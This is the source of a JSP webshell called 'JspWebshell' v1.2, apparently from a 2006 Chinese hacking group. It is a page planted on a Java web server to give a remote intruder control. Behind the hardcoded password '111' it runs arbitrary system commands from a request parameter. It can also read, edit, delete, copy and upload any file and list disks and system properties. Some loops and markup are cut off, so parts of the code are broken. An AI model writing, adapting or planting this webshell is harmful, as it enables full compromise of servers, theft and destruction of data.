<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* Title:JspWebshell
*
* Description: jsp网站管理
*
* Copyright:绝对零度[B.C.T] Copyright (c) 2006
*
* Company: zero.cnbct.org
* PS:本程序是小弟处于兴趣所写,如有疑问请联系QQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//密码
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("文件已经存在!");
}
else
{
file.createNewFile();
result = true;
System.out.println("文件已经创建!");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("目录已经存在!");
result = true;
}
else
{
file.mkdir();
System.out.println("目录已经建立!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("目录已删除!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", " ");
str = str.replaceAll("<", "<");
str = str.replaceAll(">", ">");
str = str.replaceAll("\r\n", "
");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "命令错误\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
JspWebShell By 绝对零度
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
| 8JspWebShell
version 1.2管理登录 :::... |
Power By
绝对零度 |
|
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("密码错误
");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "删除失败
\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("写入失败");}
out.print("写入成功");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<%}
else{
if (editfile!=null)//if edit
{
%>
<%}
else{%>
| JspWebShell
version 1.0(网站目录:<%=config.getServletContext().getRealPath("/")%>) |
|
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
本地磁盘(<%=fs[i].getPath()%>)
<%}%>
|
|
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? " " : result%>
<%}%>
|
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
| |
|
<%if(copyfinish==true) out.print("复制成功");%> |
<%//上传
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("文件创建成功!
");
}
catch(IOException e)
{
out.print("文件创建失败!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j
<%=fList[j].getName()%> 删除
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
|
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j
<%=fList[j].getName()%>
<%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑
删除
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
|
Power By 绝对零度[B.C.T] QQ:48124012
<%}//if edit
}
}
%>